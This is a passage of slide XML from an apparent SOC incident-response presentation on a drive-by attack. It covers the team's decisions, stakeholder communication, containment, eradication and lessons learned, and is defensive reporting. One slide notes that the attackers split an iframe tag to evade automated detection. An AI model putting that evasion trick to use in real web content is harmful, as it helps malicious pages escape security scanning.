                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>    We find that the  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>Ifram</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t>Splits  to avoid </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t>    detection by automated security systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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679594" y="2127838"/>
            <a:ext cx="4184672" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detection Avoidance:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Abadi" panose="020B0604020104020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Splits the </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> tag to avoid detection by automated security systems.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7678" y="1680479"/>
            <a:ext cx="7940728" cy="66017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2" name="TextBox 12"/>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14</a:t>
            </a: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sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1976625" y="1216817"/>
            <a:ext cx="14334750"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DECISIONS MADE THROUGHOUT THE RESPONSE PROCESS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7215"/>
              </a:lnSpc>
            </a:pP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6" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3118116" y="4005737"/>
            <a:ext cx="13311957" cy="727710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>·Decision to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>IsolateAffected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Systems:This</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>madeto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> immediately halt the spread of the infection, which proved effective in limiting the impact.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2095323" y="4043837"/>
            <a:ext cx="597723" cy="597723"/>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20" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2223836" y="423415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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3118116" y="5574861"/>
            <a:ext cx="13520760" cy="1470660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>·Choice of Tools for Investigation: The SOC team decided on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>usingWireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>, Kibana, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Sguil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> based on their capabilities to analyze network traffic and security alerts effectively.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2095323" y="5612961"/>
            <a:ext cx="597723" cy="597723"/>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25" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2223836" y="580328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sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3118116" y="7143986"/>
            <a:ext cx="13801187" cy="727710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>·Communication Strategy: A proactive communication strategy was adopted to keep stakeholders informed, emphasizing transparency in handling the incident</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Group 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2095323" y="7182086"/>
            <a:ext cx="597723" cy="597723"/>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30" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2223836" y="7372406"/>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2" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17857396" y="8851031"/>
            <a:ext cx="263689" cy="407670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1680"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>15</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1680"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Open Sans Bold"/>
              <a:ea typeface="Open Sans Bold"/>
              <a:cs typeface="Open Sans Bold"/>
              <a:sym typeface="Open Sans Bold"/>
            </a:endParaRP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sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1930115" y="1216817"/>
            <a:ext cx="14010728" cy="18554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COMMUNICATION ACTIVITIES WITH STAKEHOLDERS</a:t>
            </a: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6" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3118116" y="4005737"/>
            <a:ext cx="13311957" cy="1294766"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3080"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>·Stakeholder Notification: Upon confirmation of the incident, the SOC team promptly communicated with relevant stakeholders, including upper management and the IT department.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4340"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2095323" y="4043837"/>
            <a:ext cx="597723" cy="597723"/>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20" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2223836" y="423415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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3118116" y="5574861"/>
            <a:ext cx="14572366" cy="1934845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3080"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>·Content of Communication: The notification included: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3080"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>•Nature of the attack and its potential impact</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3080"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>• Immediate actions being taken for containment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3080"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>• Requests for resources or assistance, if necessary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3080"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2095323" y="5612961"/>
            <a:ext cx="597723" cy="597723"/>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25" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2223836" y="580328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sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3359597" y="8166932"/>
            <a:ext cx="13559705" cy="1189356"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3220"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>·Public Relations Communication: Following the incident, the public relations team addressed inquiries from concerned users about potential risks and reassured them regarding the organization's response measures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Group 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2003265" y="8214557"/>
            <a:ext cx="597723" cy="597723"/>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30" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2131778" y="840487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sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 13"/>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4" name="TextBox 14"/>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16</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1693386" y="1924685"/>
            <a:ext cx="21130963" cy="6390005"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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Containment and Eradication Procedures Implemented</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 Containment Actions:</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o Immediate Isolation: The compromised system was isolated from the network to </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prevent further infection.</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o Blocking Malicious Connections: Firewall rules were updated to block outbound </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connections to the malicious IP address and associated domains.</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o Flagging Affected Endpoints: Affected systems were marked for further </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investigation and monitoring.</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 Eradication Actions:</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o Malware Removal: Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>Sguil</a:t>
            </a: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 Wireshark, and Kibana, the SOC analysts </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identified and removed malware from affected hosts using endpoint security tools.</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o Patch Management: All vulnerable software components were patched to </a:t>
            </a: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prevent future exploitation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3220"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="23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o Log Analysis: Detailed analysis of logs was conducted to identify any indicators </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3220"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pP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of compromise (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>IoCs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>) and confirm that no other systems were affected.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09</a:t>
            </a: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sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6859472" y="1683203"/>
            <a:ext cx="4569056" cy="18554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LESSONS LEARNED</a:t>
            </a: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6" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3500572"/>
            <a:ext cx="18288000" cy="3699510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ct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Key Takeaways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ct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Regular vulnerability scanning: Ensuring that legitimate websites are regularly scanned for vulnerabilities can help </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>detectand</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patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>potentialweak</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points that attackers may use for drive-by attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ct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-Enhanced monitoring: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
